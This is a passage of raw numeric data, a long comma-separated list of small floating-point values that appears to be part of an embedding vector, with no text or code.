,-0.029946968,-0.0073658223,-0.025597343,0.0007411042,0.0051262174,-0.009867204,-0.0013716851,-0.012593086,0.0058999425,0.016122498,0.006856011,0.026757803,-0.013255425,0.005561208,0.023290815,0.011369987,0.0193946,-0.016611207,0.010310541,0.01945989,-0.018604737,-0.015357986,-0.010711244,-0.021054687,0.0026547739,0.00834457,-0.01039099,-0.013881478,0.0060105086,-0.02458042,-0.009635336,-0.004169288,0.011675936,0.00095859764,-0.015530585,-0.018293636,-0.03809616,-0.00032633854,-0.016394801,-0.0039486084,0.02719797,-0.014084704,0.006393206,0.012734268,-0.0007305159,-0.0018457546,-0.010683975,0.033732206,0.0045861914,0.0006481121,0.007769123,0.028133096,-0.004395197,-0.015510596,0.0016445902,-0.021575969,0.06260448,-0.0062828343,-0.003526624,0.011557583,0.014742895,-0.019678704,-0.009369399,0.035808504,-0.012014937,0.02271227,0.0072488906,0.017968686,-0.006387048,-0.0042355172,-0.02332838,-0.023905044,0.004461671,0.008152509,-0.03754059,-0.0019425313,0.009940567,0.0131136915,0.008494525,0.011499875,0.015075991,-0.010773962,-0.021084912,0.0007582762,-0.0006739228,-0.0039462196,0.010176561,-0.0064035794,-0.0013246732,-0.00069531705,0.02621756,0.0021457418,0.01974788,0.0085696485,-0.009353553,-0.028923733,-0.028100088,-0.0006402231,0.00025929787,-0.012773919,0.016578382,0.0062415646,0.041208588,0.022471841,0.0064026113,-0.008813669,0.015735364,-0.0052793706,-0.010611314,-0.0046754247,-0.0038350848,0.0043755285,0.0007613039,-0.0029007052,-0.010085086,0.012954563,-0.00032780948,0.031331982,-0.0343337,0.031848706,-0.000062886145,0.018537251,0.007310325,0.031230092,-0.039124485,0.009037601,0.008178416,0.008105916,0.027653811,0.019015588,0.00086367084,-0.013276695,0.0026376215,-0.013306486,0.015621054,-0.0056432504,-0.009077654,0.011153899,-0.024186084,0.0021644905,-0.0079904925,0.021606358,-0.0003013105,0.011075934,0.004894482,0.016061727,-0.026981914,0.0016894192,-0.0048460844,0.0129682105,-0.0045940345,-0.009757813,0.06356997,-0.02751225,0.010100932,0.005882694,0.0044711786,-0.00036887664,-0.0084295655,0.22838736,-0.0019901693,0.012536534,-0.013053093,0.009083678,-0.009373558,0.0049670786,0.0035165516,-0.011547092,0.012256507,-0.012597236,-0.0008172499,0.010338259,-0.00025039108,0.03780641,-0.03334497,-0.014701814,-0.0015952627,-0.018670607,0.01741034,0.005113689,-0.011568046,-0.0034086693,-0.011320074,0.0043486953,0.02139524,0.0063205645,0.0026410923,0.008276132,0.018169899,-0.0136216795,-0.011983025,-0.0025439106,-0.0074841026,-0.019985178,-0.014690137,-0.011575224,0.029067434,-0.0008416093,-0.006235997,-0.0015276379,0.009310383,-0.017532865,0.008906367,0.007819862,0.004044913,0.006248711,-0.0062800506,-0.014395216,0.030345645,0.0047554257,0.011581165,-0.0019649481,0.007398924,0.009904484,-0.003749223,-0.011891815,-0.0012872828,-0.00310451,0.031919964,0.027511474,-0.012846845,0.005360626,0.00768004,-0.0004460605,0.009252548,0.006393991,0.054334927,-0.0040291557,-0.017024625,0.020972949,-0.0010143066,-0.006780511,-0.02193877,-0.013795589,0.0076391534,0.02353999,0.010339396,0.006576156,-0.01401045,-0.0012606672,-0.028610574,-0.0008672859,0.014939558,-0.0054807803,0.014963929,-0.0063893613,0.0019978744,0.02003466,0.0021664097,-0.020494215,-0.0068015293,0.009546141,-0.019237,0.0006282669,-0.024709942,0.018483352,0.035132926,-0.0025601124,-0.02636282,0.017909076,-0.012457543,-0.007371938,0.01187538,0.01763652,0.0017498586,0.025102234,-0.03263247,-0.0046516103,-0.0067030797,-0.004405479,0.0000061332225,0.013196186,-0.013843279,-0.010394407,-0.038411323,-0.03913392,0.019123346,0.12284785,0.001921548,0.0088437,0.00739126,0.03329411,-0.009835411,0.011606562,0.015110265,0.001684609,-0.0020822582,-0.0013946153,-0.009036574,0.030383196,0.013539022,-0.012660955,-0.0024900103,0.003433546,0.020366624,-0.008280647,0.012893556,0.012704339,-0.011425171,0.008816596,-0.009424171,-0.010673626,-0.009921092,-0.0035000783,-0.0030207704,-0.00778902,0.010283615,0.021989549,0.009166874,0.0006750647,0.009614709,0.0016849175,-0.025808578,0.0047842595,0.028292974,0.022720404,-0.007359936,-0.0095059145,-0.004357466,0.015397477,-0.008450386,-0.013403072,-0.011460289,0.007943674,-0.0002434127,-0.0066915588,-0.017559072,0.010731933,-0.0094411345,-0.0064998083,-0.021353746,0.0056624697,-0.005540523,0.013398342,-0.0111226225,0.015002805,-0.007415021,0.003074313,0.001068597,0.00047382203,0.014057571,-0.015806919,0.0035088523,-0.017616104,-0.014840622,0.005579219,0.0015408857,0.0040958724,-0.019341722,-0.015619511,0.031652812,0.010316295,0.008473041,-0.01517257,0.0051080873,0.010453286,0.009401797,-0.0065986975,0.0066090412,0.011195279,-0.01795778,-0.03162968,-0.012104472,-0.0095187565,0.009669297,0.018801618,-0.020419763,-0.0177852,0.0015909582,-0.022716561,-0.0066472893,-0.007268061,0.035624065,-0.01535545,0.009871668,-0.01789908,-0.004498453,0.004902224,-0.008814394,0.0020191188,-0.011701475,0.002530869,0.0006076866,-0.021774076,-0.0022371702,-0.0011690853,-0.006365284,-0.015037145,-0.0017746625,0.0075964537,-0.00963579,-0.014769031,0.008713602,-0.049150977,-0.016987678,0.028457556,0.007010595,0.011312074,-0.011126853,-0.0030803643,0.017771201,-0.0059857145,-0.018118614,0.0016325009,0.011559969,0.014321036,-0.0013858663,0.0035192736,0.0014900289,-0.0025685339,0.019966189,-0.022269849,0.024736352,-0.00024244763,-0.0029636743,0.027175393,-0.00020953368,0.0046576005,-0.0035226634,-0.009260528,-0.019110868,0.0069947448,-0.039854884,0.025208848,-0.034173336,0.00024034719,0.010049222,0.002465277,-0.005333847,0.0009617171,-0.019101296,0.02755419,-0.010592752,0.019611461,0.009439573,0.00994775,0.042882666,-0.005544869,-0.0036525882,0.004168877,-0.020086242,-0.035790063,-0.015547593,-0.00692853,-0.0113342535,0.007844739,-0.004828645,0.013342971,0.008308305,-0.006802557,-0.007954386,0.0045799194,0.009401281,-0.011101648,-0.0062869657,0.016242959,-0.022899188,0.02794909,0.0017577392,-0.10547336,-0.005394351,-0.008640438,-0.017472064,-0.004171736,-0.0057287524,0.016665282,0.00929608,-0.0026793256,0.004330931,-0.021197585,0.024161583,-0.028980942,-0.0031467893,-0.0114999935,0.01407112,0.0020729252,-0.015526501,0.020965049,-0.013106157,0.016152,-0.012043886,-0.0112192305,0.010587509,0.004614786,-0.016004197,0.03108904,-0.018639209,0.018302964,0.014995257,0.02187951,0.017217917,0.011706734,-0.008400325,0.0013335702,0.009218907,-0.0029353,-0.00323484,-0.012904369,-0.020624314,0.008150678,0.0062479237,0.039850194,-0.00276009,-0.0016976543,-0.009919743,-0.0054131667,-0.004088291,0.013214155,0.021674417,0.03940304,-0.009935374,-0.0024700637,0.015954332,-0.017194321,0.008389512,-0.026247036,-0.0060173473,0.00036915496,0.012692045,-0.001661554,0.019085517,-0.008898245,0.0070622806,-0.007722462,0.0012235808,-0.055177428,0.016770983,-0.019533273,-0.04181171,0.0027705214,-0.025554458,-0.013266522,-0.010575457,0.027555203,0.0066136606,0.030024495,-0.00039833895,-0.0042660437,0.009647556,-0.008378892,0.0048637725,0.021424105,-0.029922808,0.021202099,0.004444186,-0.0078416895,-0.0011596751,-0.014453077,-0.021652546,0.027413538,-0.008575638,-0.021926636,-0.003426091,0.008752949,0.016304161,0.008294253,-0.014332212,0.008797312,0.008865248,-0.016277302,0.006651558,-0.024393493,0.026919745,0.006412762,0.024371564,0.025729535,0.001000929,0.008007846,0.0029251296,0.014436771,-0.008643914,0.0018520494,0.018962534,-0.0046271244,-0.0021518993,0.004094144,0.0057338974,0.006846296,-0.013844926,0.0124341315,0.007924891,-0.0018834211,-0.026395448,-0.00017857701,-0.028829683,0.00089583657,0.0030855685,0.001337645,0.0071598142,-0.015475396,0.13471892,0.0018570841,0.011604459,0.010289601,-0.01795358,-0.009725715,0.012374802,0.018049479,0.0002288565,-0.00022679775,0.0021021964,0.0041248524,0.013557314,-0.004838044,-0.0064006476,0.015672972,0.001218444,-0.018124595,-0.02058738,-0.003773623,0.008850708,0.006938445,-0.003068671,-0.0014798467,0.002225758,-0.022384569,0.0004959812,0.015236618,-0.0017380565,-0.008964804,0.016930884,0.028513897,0.014727957,0.0118063735,0.00042317648,-0.022750156,-0.0012245264,-0.02835842,-0.019735593,-0.01602577,0.011067127,-0.006495917,-0.009368377,-0.0011530551,0.005399837,0.006206415,-0.0020539004,-0.094983436,0.009340814,-0.008635361,0.010296317,0.020297635,0.024199516,-0.009894209,-0.007830043,0.033029918,0.0045834626,-0.004322358,0.0026132977,0.029735914,-0.024926664,0.001566013,0.01158116,0.006544134,0.015922334,0.0021216092,0.0027761199,-0.014917835,0.019725848,0.018188855,-0.012619859,0.0005956855,-0.0059198975,0.0025819426,0.009205066,-0.016020639,-0.014085508,-0.0060805175,0.0084776385,-0.018184608,-0.0006147004,-0.027820593,0.00791453,0.024458218,0.027465004,0.0068961284,0.00031127702,-0.008409507,0.029973002,-0.00672317,-0.013518421,-0.0119498875,0.004410605,0.012289596,-0.0023165096,0.0053067603,-0.00019260978,-0.0026349712,0.011426592,-0.004592022,-0.00015255496,-0.0246499,0.009789783,-0.0051402887,-0.015551822,0.0027306306,-0.0064036148,-0.012718127,-0.004575892,-0.014692624,0.011688568,-0.031795457,0.017978685,0.0076548653,-0.023881795,-0.0021962733,-0.02256638,-0.024484439,0.03444696,0.009029632,0.0033557173,-0.0084864255,-0.00942093,0.01811418,-0.025640748,0.011131858,0.010503027,-0.0014203079,0.012933699,0.0053238594,0.012872494,-0.013888369,-0.014966128,0.0028950255,0.014894281,-0.01422565,0.008579638,0.010299335,0.00003792163,0.0028025885,-0.021881873,-0.014286206,0.0056564133,0.015976269,-0.018827347,-0.00986494,-0.00052435667,0.00403365,0.008119757,-0.003745798,0.028572833,0.018419517,-0.00860137,0.011747566,0.0054416386,0.00512199,0.025426751,0.017090295,0.0058281054,0.004633283,0.0053554475,-0.005723788,-0.023210146,-0.005663296,-0.024852905,0.015527322,0.011728928,-0.01968541,-0.0068134796,0.020494848,0.014422254,0.0107192155,0.011562678,0.011701026,-0.002577617,0.01326807,-0.015012845,-0.015218906,-0.012153672,0.0030187475,-0.015147719,-0.009095485,-0.004968185,-0.0055474606,0.0079324925,0.020971717,0.011579078,0.0030633835,-0.025497453,0.009446239,0.00017957872,0.0037138832,0.0058887587,0.016810592,-0.029326536,0.0030016338,-0.008492475,-0.0025614281,-0.016076969,0.0011825649,-0.0035633347,-0.0018956482,-0.0017193337,0.010327226,0.020581404,-0.00049505057,0.011049908,0.0076530515,-0.010671098,0.0012599281,-0.0003833415,-0.0010689163,0.010781809,-0.011249135,0.012827133,-0.018074218,0.01746823,-0.020556193,-0.015269031,-0.004112553,0.0043064663,0.011177767,-0.029926682,-0.010034663,0.0047196047,0.0008373528,0.029404597,-0.004646699,0.0014146154,-0.003574675,-0.021950793,-0.001544063,-0.009666822,-0.017624753,0.0061178287,0.015994497,-0.03736713,-0.007935016,-0.015541568,0.01938968,-0.018903315,-0.023321439,0.00076107495,-0.011536596,-0.0026004121,-0.020732874,-0.0076268227,-0.008218407,-0.004814729,-0.0014240562,-0.005555627,-0.0072866986,-0.012942101,-0.060468156,-0.01595772,-0.021376256,0.009370078,0.00046183288,-0.048674732,0.006101644,0.036262795,-0.004862255,0.010365924,0.003375214,0.019856172,-0.025068695,0.00038719398,-0.015755745,0.013940044,-0.042327255,0.027707273,0.0006350851,0.022201093,-0.006015017,-0.0073240753,-0.0034576578,0.009366048,0.0046492596,-0.055472307,-0.0075050173,-0.022331452,-0.011656315,0.019660447,-0.004032583,0.013238214,0.04876995,-0.0033015232,-0.0057711946,0.020023014,0.010156308,0.021027315,-0.0039184988,0.019445458,-0.0048024193,0.012825638,0.01849088,-0.010004076,-0.010750802,-0.019104773,-0.017516956,-0.027710665,-0.011159717,-0.012778688,-0.0075765466,-0.027636547,-0.013872214,0.016336933,-0.008103348,-0.00127088,-0.0090522505,0.005066323,-0.01653778,0.012149998,-0.022363551,-0.013461281,-0.0016720135,0.0038196463,0.043375622,0.00664483,-0.010794568,-0.018527381,0.010303117,0.005735087,-0.004812258,0.00463901,0.08672487,0.018685414,0.03228614,-0.013442306,-0.018924385,-0.007299288,0.019978177,0.0027269658,-0.003982171,0.018796165,0.003722128,-0.0016308842,0.028735762,0.010263857,0.0014739451,0.028814893,-0.025815982,0.0004383714,-0.014311341,-0.010360375,-0.0055673583,0.021979395,-0.012311113,-0.0048252894,-0.02168297,-0.0075818896,-0.0015029586,0.0023383056,-0.011100036,0.008705645,-0.019127265,0.0069320826,-0.008670558,-0.014224148,-0.0011177348,-0.013587887,0.011572974,0.009284481,-0.024074204,-0.017872399,-0.008464777,-0.0074401353,0.014856827,0.015396689,-0.03264912,0.005279705,-0.003716108,0.013751835,0.016444247,-0.008181566,-0.026272854,-0.0028587207,-0.003508055,0.03694499,0.0009380461,0.023033852,-0.0004354245,-0.0009095991,0.01318714,-0.014604499,-0.00037943255,0.013889138,-0.013536676,0.0010480718,0.0034469329,-0.015620457,0.0063355183,0.029497098,0.028208194,0.014460465,0.008201155,0.006950796,-0.0025332212,-0.008706021,-0.004584372,-0.012429782,0.02998891,0.03440622,-0.012192866,0.002768818,0.008860132,0.00014459543,-0.004554747,0.00025800447,-0.010702226,0.0132500995,0.014953499,0.0099372715,0.002831559,0.00043287114,0.0018740734,0.0141781075,-0.0074721393,0.0048519326,-0.013735575,-0.00551887,-0.009459307,-0.011958571,0.002869691,0.021173576,0.022435898,-0.008454991,-0.0018786545,0.014816539,-0.011505363,-0.018888948,-0.060271278,-0.00084922777,-0.009491346,-0.007893415,-0.030701429,-0.023604935,-0.013950455,-0.018396411,-0.0052960706,0.02892716,-0.011190284,0.019714165,0.0001534985,-0.0074309204,-0.020743141,-0.018472632,-0.0019978785,-0.014288457,-0.038324405,0.016784804,-0.016515868,-0.0031248091,-0.011416559,-0.020305427,0.00863842,0.005487094,-0.0020337142,-0.013332263,-0.016262585,0.0058309645,0.03748311,0.032179814,0.0067589283,-0.021831961,-0.011387435,-0.0046718377,0.024529196,0.01369548,0.006590033,-0.005785946,-0.014279828,0.008710004,0.002135682,0.016391682,0.030918106,-0.010928149,-0.016969582,0.002118357,-0.02392078,-0.023587694,0.015250836,0.02421137,0.0012402394,-0.00075783796,-0.0030218225,-0.028896913,0.0013765321,-0.008737488,0.005454906,-0.006241467,-0.0032245459,-0.019669533,-0.008415867,-0.026208207,-0.01768815,0.005569919,0.00097105815,0.0053775967,0.009237956,-0.024704548,0.022511052,0.0011632314,-0.01698837,-0.0099174855,-0.015608788,-0.0042061666,-0.0012227957,-0.0017403205,0.018895762,-0.016421232,-0.022424094,0.014916718,0.0038280338,-0.0063668597,-0.0056616357,0.01106638,-0.010781096,-0.00049824646,0.0070093563,0.024794677,-0.0007051935,0.002041882,-0.0032556772,-0.00043226883,-0.009096085,0.0016571009,0.012279503,0.0010530746,-0.0052880705,-0.016230483,-0.005420396,0.0001528314,0.12404862,0.0063740197,-0.04064471,0.0052472586,0.015192858,-0.014077348,-0.0017535898,0.010772802,0.016571341,-0.0074885692,-0.01440959,0.007367058,-0.0027109827,0.0028796517,-0.0050936476,-0.012003326,0.021766802,0.007736106,0.0008072036,-0.01437881,0.014950171,0.0069038654,0.018766616,0.013137706,-0.007477353,0.0077564362,0.019649677,0.023285089,-0.008527979,-0.0039256318,-0.02900563,-0.014453223,-0.006805941,-0.008964948,0.007465048,0.0037385835,0.008852215,0.027748255,-0.010079121,0.022645405,0.030048944,-0.004752895,0.01806937,0.00022224116,-0.010981191,-0.0017001738,0.020808447,0.01142852,-0.0072209775,0.0092553105,0.008379812,0.00087870256,0.0007529077,0.01419057,-0.006515477,0.034613036,-0.0031764389,-0.009356669,-0.017862527,-0.0149081955,0.0054993033,0.007865049,0.012480162,0.021734959,-0.0023386744,-0.00057474955,-0.010090875,-0.01728017,-0.009822201,-0.017482279,-0.0038215322,0.026933119,0.035025243,-0.019034605,-0.018391406,-0.006534674,0.0073598498,-0.012250789,0.0104790265,0.009421604,0.0140767805,-0.008197876,0.009702572,0.011863565,-0.009383769,-0.001989416,-0.008738319,-0.025218328,0.005441034,0.021806924,-0.006929677,-0.00088670035,0.04025599,0.002760215,0.028393544,0.0038518675,-0.028807245,-0.027984174,-0.01908705,0.022743022,0.012398418,-0.014326315,-0.0039164587,0.014503148,-0.008821871,-0.017853746,-0.002122824,-0.01022422,0.012435519,0.010788984,0.0048109293,0.019537747,0.0026622473,0.0072813416,0.010712884,-0.0058759125,-0.015266742,0.013588827,-0.010751309,-0.003057391,0.0024214406,-0.0092809135,-0.011532472,-0.011197253,0.0123033095,0.032793216,0.004826909,0.0035623799,0.014928627,-0.001197324,0.0100374445,-0.06774483,0.014779861,0.014447156,-0.025949264,0.011075268,-0.005353336,0.0017323118,-0.009089726,0.0020768128,0.0037478413,0.0032859026,0.00063510647,-0.024233805,0.016735146,0.017711287,0.020500584,0.002333514,-0.0011835113,-0.0011655545,0.00038906795,-0.0051844697,-0.038174286,0.005886194,-0.017789524,0.0024695022,-0.014562318,-0.025149554,-0.0024918192,-0.024981018,-0.016540999,0.011788957,0.020378327,0.014093861,0.0033206185,-0.0033132108,0.019581622,-0.036435373,0.015247358,0.0015654778,-0.020295577,0.012651174,-0.011554741,-0.023373943,0.02117659,0.010607511,-0.020211227,0.009651076,-0.027539752,0.0063910256,-0.0102864895,-0.019702492,0.0024721548,0.005840314,0.0019669288,0.0028398058,0.025317896,0.017287731,-0.020329732,0.003888156,-0.000974848,0.010306533,0.004107551,0.0046477825,0.027651982,0.011922138,0.0042868396,-0.009573319,-0.009723547,0.011898997,-0.003827013,-0.022064354,-0.0024701452,-0.0049771396,0.0047645937,0.017046548,0.00036185712,0.025178326,0.02242596,-0.0029966026,-0.010704363,-0.041071035,-0.025228418,-0.015825318,0.0014287309,-0.0032201149,-0.0075227595,0.0035243821,0.009193121,-0.010513002,0.00047351982,-0.010625036,-0.00565742,0.0013305777,0.015229025,0.0004573698,0.0009029031,-0.0063249543,0.007857612,-0.019030092,0.0080230925,-0.014144444,0.0010688519,0.0077065327,-0.0006073755,-0.025390007,0.011183178,-0.009340811,0.0066774567,0.0029711798,-0.0039264807,-0.0072634877,-0.011149636,-0.0034059468,0.023417288,0.0054497398,0.004466642,0.008988748,0.007821241,-0.002159478,0.01787201,-0.0044990736,-0.0017397254,0.02389238,0.017252833,-0.009068542,-0.0066895704,0.009268971,-0.009619319,-0.0016318645,-0.0074267075,-0.0036144245,-0.021024292,0.018974926,0.0005783492,0.013419729,0.007930447,0.00038174263,-0.002972486,0.019858126,-0.02786739,-0.010656628,-0.0066920943,0.019055964,0.00022344508,0.0006745793,0.024214411,0.017388454,-0.0035562085,-0.02310885,0.005952479,-0.024123706,0.00438282,-0.004140727,-0.038431536,0.016364256,-0.00022457524,-0.009499755,-0.0023689691,0.0019635297,0.0016789815,0.0013435044,0.0046285433,-0.0008879246,-0.018085819,0.018386867,0.009019824,0.008051689,-0.017007895,0.023629168,-0.017916813,0.005601841,0.006454573,0.010985939,0.0023659833,0.011291563,0.0030722886,-0.01601416,-0.012448709,0.028018413,-0.035449088,-0.012562606,0.027708795,0.013535503,-0.013876484,0.027796347,-0.0030678893,0.00843267,-0.003807817,-0.0020831558,0.006634027,0.002146802,0.0020199984,0.016494907,0.020986099,-0.0076092356,-0.00666479,0.010743022,0.007964701,-0.010272777,-0.00012756082,0.013498286,0.020262793,0.026252717,0.0066423975,0.008795428,0.011075672,0.009782049,0.027284324,0.014311891,0.035294443,0.0088872,-0.006748257,-0.004998031,-0.017169137,-0.0046451227,-0.01117649,0.0033863808,0.005648923,0.00465902,0.010590873,0.01361619,0.0023747692,-0.016620638,0.011802489,-0.0078609185,0.01120511,-0.0039951033,0.0052981,0.0016095607,-0.002806358,0.0016061892,-0.0009991212,0.007957652,-0.013924227,-0.007176362,-0.009521092,-0.03638562,0.002165906,-0.0023543378,0.015155382,0.11594712,0.0070674527,-0.0036455686,-0.015065709,-0.005694222,-0.0037420434,0.018675638,0.035528462,-0.0005331708,0.014709867,-0.0005760358,-0.021732673,-0.02129908,-0.008250358,-0.022551905,0.03729835,-0.0042335396,0.0020394041,-0.024577644,-0.032922924,0.0015860742,-0.0030027612,0.0009987557,-0.014676175,-0.0072661503,0.009022763,-0.00051815,-0.0081807,0.0062710405,0.012217257,-0.018977748,-0.01135697,-0.014576134,0.008183267,0.0035327557,-0.009600378,-0.01288131,-0.0067392895,-0.008117679,0.014075229,0.007588847,-0.016682979,-0.0016661054,-0.0013678418,-0.009425368,-0.0009776013,0.02154773,-0.023532633,-0.015339589,0.01450245,0.006742051,0.017728647,-0.00014900624,-0.045978222,-0.03423509,0.010268861,0.03164966,0.27371547,0.006544825,-0.012681238,-0.0026292214,-0.01529761,0.0029566172,0.026577223,0.010544599,0.022100147,0.008355954,-0.013731905,0.003000254,0.012343126,0.0043492946,0.0029857527,-0.0146214785,0.010792455,0.0068975864,-0.010756001,0.019775812,-0.0060923793,-0.00675864,-0.010036042,-0.012725856,-0.012823236,-0.017509984,0.0006658314,0.00856503,0.009424148,-0.0047735646,0.007244877,-0.0024523186,0.00036923357,-0.004557599,-0.0040260823,0.015002487,0.0021858986,0.0011546914,0.004089221,-0.0069061355,0.0037966326,-0.0071278964,-0.009265139,0.0026739156,-0.04037129,0.011574653,0.026501674,0.0024841896,0.012182143,0.010836021,-0.028466618,0.024376703,0.014362019,-0.012622193,-0.0021446238,0.009982169,0.009642322,0.0009254458,0.0133630745,-0.020243438,0.001605361,0.0028774827,0.00716317,0.0014125877,0.0066796504,-0.018334216,-0.00185628,-0.012663587,0.0102576455,0.02302778,0.021401783,-0.011527561,-0.0038882487,0.006962497,0.010403952,0.0022543585,0.0055221897,-0.017479923,-0.014270867,0.013685765,0.0045988434,-0.012803182,0.0060163834,-0.03581704,0.0046511493,-0.012738571,-0.0005714208,0.010719926,-0.015994174,-0.0081325965,-0.0234596,0.003655786,-0.003175695,-0.00968496,-0.00927975,0.031406313,-0.00038799885,0.010259603,0.004364845,0.015066603,-0.011421502,-0.0013810069,0.019456033,0.01535399,-0.01075972,0.02926769,0.0020014455,0.011485454,0.0049696257,0.015904846,-0.00868252,0.03137133,-0.0013487139,-0.0043665087,0.009036515,-0.0073150164,-0.014974205,0.014293096,-0.0011522209,-0.033827737,-0.0071536945,0.000043021788,0.00522738,-0.024842102,0.07003609,0.018830026,0.0078055095,0.0098017305,0.027628718,0.007236465,0.0021843596,0.010129815,0.008480175,0.008173841,-0.027095117,-0.03856398,-0.009007763,-0.0021976833,-0.0073871366,0.010839289,0.003043137,0.0049617104,-0.017097084,0.03190625,-0.020744234,-0.010714282,0.009652329,-0.0029484504,-0.011665401,-0.0049188463,-0.005403478,-0.006062249,0.0061740787,-0.0126102995,0.008199929,0.007942088,0.018172288,0.024514504,0.017062953,0.020783704,0.01602362,0.017400011,-0.0073652333,-0.015526518,-0.006222766,-0.0017821006,-0.010432676,0.004519312,0.01843651,0.0011385306,0.0029684966,0.007904117,-0.00878163,-0.00055419997,0.0065683913,0.005620756,0.01489471,0.007012361,0.00077582843,-0.0008901509,0.019117238,0.010338656,-0.0017998541,0.00661121,-0.008375121,-0.024316216,-0.01910636,0.012427899,0.011570341,0.0071601,-0.005139056,0.01519563,0.00573577,-0.019277958,0.0031687526,-0.002624376,0.0026659323,0.0014199432,-0.00069554156,-0.0029889955,-0.0039573847,-0.033684265,-0.0040451717,-0.0044528567,-0.00002146008,0.015914759,0.017807184,0.014429612,0.007856666,0.0041735894,-0.01696589,0.008970545,-0.014350711,-0.013384034,0.011587656,-0.015087899,-0.0039813747,-0.0077960496,0.0016467014,-0.012458032,-0.01071042,0.016798656,0.016057666,-0.010265332,0.020466592,0.007832835,-0.01801874,0.008722545,-0.016248494,-0.013981648,-0.0061517013,-0.0065333704,0.011876541,-0.008814318,-0.012962017,-0.022496471,0.0011849875,0.0027494254,-0.008429371,0.008063886,0.0011787687,-0.011985728,-0.004318814,-0.006625455,-0.019797722,0.0028691143,0.019648314,0.015421655,0.018917197,0.013541499,-0.02574893,-0.028824601,-0.010715692,0.009050848,0.015665183,-0.014419163,0.022348586,0.14106235,0.013283891,-0.024505498,0.012952995,-0.0014400725,-0.0045300606,0.011599232,-0.006674806,0.012190921,-0.008903937,0.013424971,-0.012877314,0.021505836,0.0023479275,-0.01605549,-0.01674062,0.015074046,0.0052833823,0.011003431,-0.006540162,0.001070035,0.017547794,0.0074657667,0.06454723,0.011327941,-0.08166581,0.015647171,-0.0025628568,0.009628816,0.0148871755,-0.0017517273,-0.015863078,0.012520505,-0.025569836,-0.011308694,0.004536473,0.00039142792,-0.008239693,-0.008893672,-0.021462187,0.016467808,0.009512653,0.014009559,-0.006587444,-0.020511154,-0.0044104294,0.004814201,0.022480188,0.005849376,-0.0073332405,0.035613127,0.007029525,-0.009534028,-0.0027689335,-0.0012888812,-0.0031347515,0.012697713,-0.0043905196,-0.002233831,0.020949166,0.014607111,0.005744344,0.0074288873,0.00814833,0.02109257,-0.004576064,-0.014038341,-0.016180681,0.004298708,-0.0073667346,-0.017702917,-0.01681102,-0.0074205208,0.005844096,-0.004081342,-0.015823564,0.01590743,0.0073337615,-0.010089339,-0.0024551824,0.0053781467,0.010940915,0.010826003,0.007948209,0.007462458,0.008209508,0.004773083,0.004280975,-0.0076316167,0.0022315644,0.0008759143,0.0021885675,-0.0319023,-0.017862316,-0.01482735,-0.005933392,-0.0047390447,0.0075635756,-0.0053003454,0.009567985,0.014587845,-0.008807285,0.0046542455,0.00059241336,0.0013759702,-0.011951007,0.0006504298,0.007675611,0.014862145,0.013414087,-0.0090662455,0.017466737,-0.0074100494,0.013578667,0.009332442,0.0031151944,-0.002226872,-0.009798704,0.017171457,-0.014628035,-0.017864835,-0.010693732,0.009104637,-0.006471261,0.0031944409,0.010538106,-0.0129556665,0.008231481,0.0118981395,-0.0046452563,-0.017249502,-0.022453837,0.023020228,0.017956644,0.0036362954,0.011443148,-0.0023661638,0.026970446,-0.0074459794,-0.0057621906,-0.0074056103,-0.004201347,0.0015001169,0.01098399,-0.023586515,0.012773389,-0.00685282,0.014339441,-0.004626782,-0.026119582,0.0025385164,-0.012069433,-0.023008998,0.00035163655,-0.016755955,0.0040538586,0.01904049,0.03315948,0.0060473927,-0.0056876563,0.024542965,0.00735419,0.010440557,-0.007556655,-0.014532676,0.030214151,-0.015851475,0.010790092,0.00076164043,-0.018047644,0.012285438,-0.005032153,0.0033955516,0.0051322416,0.003707956,0.015441338,-0.010905231,-0.016482167,-0.030652836,0.010794865,-0.01661767,-0.0023987906,-0.008048951,0.00537983,0.018179795,0.00053540926,-0.014066628,0.021618923,-0.0001893888,0.030549401,-0.012762682,-0.006176014,-0.0010233698,-0.005286056,0.01878784,0.01759813,-0.030433083,-0.0041889986,0.010949779,-0.019583425,0.016088635,-0.003648588,-0.004720053,0.018192992,-0.012175607,-0.001965555,0.001646336,0.012205271,-0.017015299,-0.007976588,-0.0070410133,0.030270496,0.017430358,-0.013091411,-0.024867933,-0.032796666,-0.00042234248,-0.003165172,0.013258933,0.019488642,-0.010141284,0.00967085,0.0029430084,0.00075590017,0.00671968,-0.010874787,0.00031211638,-0.017608568,0.0054285256,0.012396902,-0.006009741,0.007292708,-0.0060697217,0.0028638479,0.031955678,0.02343282,0.0075074444,0.0006362628,-0.013516034,-0.0058485805,-0.017261812,0.010531635,0.011580032,-0.015183413,-0.0278794,-0.012463247,0.015521184,-0.020224296,-0.004440283,0.0069446946,-0.021313494,0.004753215,-0.00042837602,-0.000061936036,0.005922969,0.0058434685,0.010774258,-0.0029222472,0.0075413967,-0.0015490126,0.023347823,0.008940508,-0.0064091217,0.007836864,0.0013364783,0.0010514234,0.014616487,-0.018064769,0.023244713,0.0027538685,-0.023512956,0.015277143,0.002886779,-0.014683498,-0.009910267,0.028553873,0.007040767,-0.00478223,-0.011729378,0.022394346,0.0038433175,0.01108048,0.0045540277,-0.020703007,-0.020481277,0.013194275,0.019327382,-0.011407488,0.037972208,-0.027474362,-0.0038301065,-0.011642571,-0.007546467,-0.021488016,0.0036842271,0.0021152461,-0.029590134,-0.0108081335,0.032193575,0.01401777,0.005746308,-0.007871153,0.026410664,-0.0054983944,-0.0058400454,0.0014208544,-0.0006680372,-0.0002741194,-0.0045300215,0.010107231,0.0021517312,0.0025832567,0.0056711603,-0.0028277214,0.007951011,-0.028869076,0.0011917015,-0.004371277,0.00055255904,-0.0125443,-0.0048686704,-0.0060592145,-0.005804047,0.0027888296,0.007141696,-0.010307981,0.014695134,-0.007238085,-0.019864159,0.016919484,0.0041254945,-0.006131174,-0.03258188,0.0006920065,0.0040210183,0.030379254,-0.021214996,0.0798719,-0.0038178149,0.0024098887,0.0037383048,-0.010294555,0.002392998,-0.019673277,-0.0010896858,0.0013216223,-0.0057758484,-0.0067348997,-0.023900274,0.0068883994,0.011271765,-0.003489113,-0.024365596,0.032752708,0.00728576,-0.016782833,0.017193716,0.0036288884,-0.0021027876,-0.010046621,0.00057286397,0.0038394616,0.15907635,0.019377392,0.0029194304,0.002217548,0.0027853923,-0.027153673,-0.002674696,-0.003979333,0.009331324,-0.019712798,0.0077204774,-0.010149573,-0.02921297,-0.047539584,0.005102982,0.009962303,-0.015859356,-0.018671991,-0.0123490365,-0.0047332617,0.022002945,0.002424645,-0.0223869,0.030694816,0.016812414,-0.0043162815,-0.016030896,0.00852366,-0.00073614815,0.015319454,-0.021506932,0.012130377,0.017359646,-0.039098777,0.0142530305,-0.011842016,-0.007158796